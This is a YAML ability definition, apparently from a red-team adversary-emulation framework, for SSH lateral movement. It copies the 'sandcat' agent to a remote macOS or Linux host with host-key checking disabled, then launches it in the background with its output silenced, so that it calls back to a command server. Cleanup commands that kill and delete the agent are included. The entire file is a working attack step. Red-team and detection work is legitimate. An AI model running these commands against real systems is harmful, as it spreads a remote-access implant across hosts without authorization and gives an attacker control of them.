- id: 10a9d979-e342-418a-a9b0-002c483e0fa6
  name: Start 54ndc47
  description: Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication
  tactic: lateral-movement
  technique:
    attack_id: T1021.004
    name: "Remote Services: SSH"
  platforms:
    darwin:
      sh:
        command: |
          scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
          ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
        cleanup: |
          ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
        payloads:
        - sandcat.go-darwin
    linux:
      sh:
        command: |
          scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&
          ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
        cleanup: |
          ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
        payloads:
        - sandcat.go-linux
  singleton: True
